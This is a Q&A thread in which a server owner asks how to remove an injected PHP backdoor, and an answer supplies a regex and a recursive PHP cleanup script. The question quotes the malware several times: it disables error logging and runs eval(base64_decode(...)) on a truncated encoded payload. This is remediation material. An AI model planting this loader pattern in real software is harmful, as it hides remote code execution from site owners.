# script to clean decode_base64 attack with complex characters

Tags: php, bash, sed, base64

Im looking around to clean a massive php attack with malicious code from one of our servers, and Im having problems around the complexity to find the correct path to search and replace text. Looking around I found how all php files has this code

```
<?php /*947353*/ error_reporting(0); @ini_set('error_log',NULL);
@ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval(
 base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwppZighJGtqZGtlX2MpIH...PSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsKfQp9'));
@ini_restore('error_log'); @ini_restore('display_errors'); /*947354*/ ?>
```

When I try to use sed command I can't remove all code, because some php files has other code in the first line, and only removing first line is not a solution.

First I create the file with infected files:

```
grep 'ZXJyb3JfcmVwb3J0aW5nKDApOwppZ' ./ -Rl > infected.txt
```

using;

```
for hackFile in `cat infected.txt`; do sed -i 's#<?php *ZXJyb3JfcmVwb3J0aW5nKDApOwppZ* ?>##' $hackFile; done
```

I finish the loop to remove all infected files, but for all special characters produce errors all the time and I can't find the exact filter. Somebody can help me to do the correct sed filter?
Other tests

```
for hackFile in `cat infected.txt`; do sed -i 's/<?php*ZXJyb3JfcmVwb3J0aW5nKDApOwppZ* ?>//g'
```

I don't know how to filter special characters like / or *

To put and example, some php files appears starting the first line with

```
<?php /*947353*/ error_reporting(0); @ini_set('error_log',NULL);
    @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval(
     base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwppZighJGtqZGtlX2MpIH...PSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsKfQp9'));
    @ini_restore('error_log'); @ini_restore('display_errors'); /*947354*/ ?>
```

And I can remove directly the line. But exist other case:

```
<?php /*947353*/ error_reporting(0); @ini_set('error_log',NULL);
    @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval(
     base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwppZighJGtqZGtlX2MpIH...PSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsKfQp9'));
    @ini_restore('error_log'); @ini_restore('display_errors'); /*947354*/ ?> <?php
```

And exist the possibility to have a php file with more code in the first line not finishing only in "

So, I need to remove the code, not replace for any character, and not affecting the rest of the line. I saw the form to remove with sed the line completely, but I'm looking only the code inserted being the pattern

Obviously we are debugging to stop future attacks, but first I need to clean the code to restart the website.

If someone is curios I can send the decoded code too.

Thanks

Comment: What exactly do you want to replace? Everything between `base64_decode(...)` or more?

Comment: Removing every instance of that snippet isn't guaranteed to fix your problem. How do you know that other security issues haven't been introduced? You'll have better luck spinning up clean servers with known safe code from your version control system, backup, etc.

Comment: Please do show us sample of expected output in code tags. Also please let us know which kind of characters you want to remove?

Comment: `rm -rf $everything; backup_utility restore $everything; patch_utility update $everything;`

Comment: Even more important - did you figure out how you were infected in the first place?

Comment: Justly is and old wordpress without backups so I need first to clean the exploit before to debug, because code block the website. But this is wordpress devel job, Im starting recovering the website. And looking internet and reports from infected files seems a problem with theme used.

Comment: @deconya, which plugins were you using when the hack took place?

Answer (score 3, accepted):

I have the same issue today on a **Drupal 7** after a Base64 Attack occured this night. Here is my working solution making a regex, scanning all files and removing the infected parts.

**The Regex**

This regular expression will catch all code between `/*947353*/` and `/*947353*/` (in my case `/*435345352*/`) ([Debuggex demo here](https://www.debuggex.com/r/8h0s5tkBeCSCeqFM)) :

```
/\*435345352\*\/(.*)\/\*435345352\*\/
```

**The script**

After that, I made a PHP script that browses all files and clean them.

```
function scanAndClean($start) {
    $contents = scandir($start);
    array_splice($contents, 0, 2);
    foreach ($contents as $item ) {
        $path = "$start\\$item";
        if (is_dir($path) && (substr($item, 0, 1) != '.') ) {
            scanAndClean($path);
        }
        elseif(in_array(pathinfo($path, PATHINFO_EXTENSION), array('php','inc','module'))) {
            cleanFile($path);
        }
    }
}

function cleanFile($file) {

    echo "file scanned : $file...\n";

    $content = file_get_contents($file);
    $pattern = "/\/\*435345352\*\/(.*)\/\*435345352\*\//";
    preg_match($pattern, $content, $matches, PREG_OFFSET_CAPTURE, 3);
    if(sizeof($matches) > 0) {
        file_put_contents($file, str_replace("<?php  ?>", '', preg_replace($pattern, '', $content)));
        echo "\nfile cleaned\n\n";
    }

    else {
        echo "file Ok\n\n";
    }
}
```

**Run it!**

Placed in website's root directory, this script will scan all subdirectories and returns `*.module`, `*.inc`, and `*.php` (that are all potentially infected php files in my case).

```
// start from this directory
$dir = getcwd();

// to go to parent directory (if script placed in a subdirectory)
//chdir("../");
//$dir = getcwd();

// run scan and clean...
$files = scanAndClean($dir);
```

After that, my site was instantly online again.

**Notes**

> **WINDOWS / LINUX VERSION** This version is for Windows IIS Server. For a Linux path change `$path = "$start\\$item";` to `$path = "$start/$item";`

*Thanks to [@koushik-das](https://stackoverflow.com/users/4653436/koushik-das) for `show_files()` function https://stackoverflow.com/a/37384003/2282880*

Consider the following article to prevent new attacks... https://www.thonky.com/how-to/prevent-base-64-decode-hack